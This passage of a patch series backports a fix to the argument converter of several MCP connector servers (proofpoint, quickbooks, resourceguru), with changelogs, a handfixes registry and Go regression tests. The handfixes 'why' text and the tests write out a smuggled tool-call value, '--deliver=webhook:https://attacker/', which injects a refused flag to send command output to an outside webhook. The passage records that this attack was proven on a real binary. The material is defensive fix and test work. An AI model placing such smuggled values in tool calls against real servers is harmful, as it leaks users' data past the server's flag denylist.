+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/proofpoint/handfixes.json
+++ b/skills/proofpoint/handfixes.json
@@ -156,8 +156,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -167,7 +179,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/proofpoint/handfixes.json
+++ b/skills/proofpoint/handfixes.json
@@ -141,6 +141,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/quickbooks/CHANGELOG.md
+++ b/skills/quickbooks/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.7] - 2026-08-26
 

--- a/skills/quickbooks/CHANGELOG.md
+++ b/skills/quickbooks/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.8]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.7] - 2026-08-26
 
 ### Fixed

--- a/skills/quickbooks/CHANGELOG.md
+++ b/skills/quickbooks/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.7] - 2026-08-26

--- a/skills/quickbooks/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/quickbooks/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/quickbooks/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/quickbooks/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/quickbooks/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/quickbooks/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/quickbooks/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/quickbooks/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -225,4 +226,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/quickbooks/handfixes.json
+++ b/skills/quickbooks/handfixes.json
@@ -384,8 +384,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -395,7 +407,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/quickbooks/handfixes.json
+++ b/skills/quickbooks/handfixes.json
@@ -369,6 +369,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/resourceguru/CHANGELOG.md
+++ b/skills/resourceguru/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/resourceguru/CHANGELOG.md
+++ b/skills/resourceguru/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/resourceguru/CHANGELOG.md
+++ b/skills/resourceguru/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/resourceguru/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/resourceguru/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/resourceguru/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/resourceguru/cli/internal/mcp/cobratree/shellout.go
@@ -314,6 +314,13 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -323,10 +330,10 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -334,11 +341,11 @@ func cliArgsFromMCP(args map[string]any, blocked map[string]bool) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/resourceguru/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/resourceguru/cli/internal/mcp/cobratree/shellout_test.go
@@ -86,7 +86,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"profile":  true,
 		"token":    true,
 	})
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -115,7 +115,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in, map[string]bool{"args": true})
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -171,7 +171,7 @@ func TestBlockedStructuredArgsOnlyDropsInheritedRootFlags(t *testing.T) {
 		"config":  "/tmp/evil.yaml",
 		"json":    "true",
 	}, blocked)
-	want := []string{"--json", "true", "--profile", "local-profile"}
+	want := []string{"--json=true", "--profile=local-profile"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP command-aware blocklist: got %v, want %v", got, want)
 	}
@@ -389,7 +389,7 @@ func TestCLIArgsFromMCPSkipsStructuredPositionals(t *testing.T) {
 		"id":       "123",
 		"format":   "json",
 	}, blocked)
-	want := []string{"--format", "json"}
+	want := []string{"--format=json"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP forwarded positionals as flags: got %v, want %v", got, want)
 	}
@@ -699,4 +699,113 @@ func toolResultText(result *mcplib.CallToolResult) string {
 		return ""
 	}
 	return text.Text
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled}, blockedRootFlags)
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
+}
+
+// TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags is the end-to-end
+// half of mcp-argv-value-joined: the argv the child process actually
+// receives. The exploited shape was a doctor tool call whose json value
+// carried a denylisted --deliver.
+func TestShellOutJoinsValuesSoTheyCannotSmuggleRootFlags(t *testing.T) {
+	bin := writeArgvHelper(t)
+	handler := shellOutToCLI(
+		func() (string, error) { return bin, nil },
+		[]string{"doctor"},
+		map[string]bool{"args": true, "deliver": true},
+		map[string]bool{"json": true},
+		nil,
+		true,
+		nil,
+	)
+
+	result, err := handler(context.Background(), mcplib.CallToolRequest{Params: mcplib.CallToolParams{
+		Arguments: map[string]any{"json": "--deliver=webhook:https://x/"},
+	}})
+	if err != nil {
+		t.Fatalf("handler returned transport error: %v", err)
+	}
+	if result.IsError {
+		t.Fatalf("handler returned tool error: %s", toolResultText(result))
+	}
+	got := decodeArgvResult(t, result)
+	want := []string{"doctor", "--json=--deliver=webhook:https://x/"}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("shellout argv = %#v, want %#v", got, want)
+	}
+	for _, tok := range got {
+		if strings.HasPrefix(tok, "--deliver") {
+			t.Fatalf("a tool-call value reached the child as its own --deliver argv element: %#v", got)
+		}
+	}
 }

--- a/skills/resourceguru/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/resourceguru/cli/internal/mcp/cobratree/shellout_test.go
@@ -760,15 +760,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args, blockedRootFlags) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args, blockedRootFlags)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/resourceguru/handfixes.json
+++ b/skills/resourceguru/handfixes.json
@@ -385,8 +385,20 @@
         },
         {
           "file": "cli/internal/mcp/cobratree/shellout.go",
-          "contains": "\"--\"+k+\"=\"+",
-          "min_count": 4,
+          "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+          "min_count": 1,
+          "code_only": true
+        },
+        {
+          "file": "cli/internal/mcp/cobratree/shellout.go",
+          "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+          "min_count": 1,
+          "code_only": true
+        },
+        {
+          "file": "cli/internal/mcp/cobratree/shellout.go",
+          "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+          "min_count": 1,
           "code_only": true
         },
         {
@@ -396,7 +408,14 @@
         {
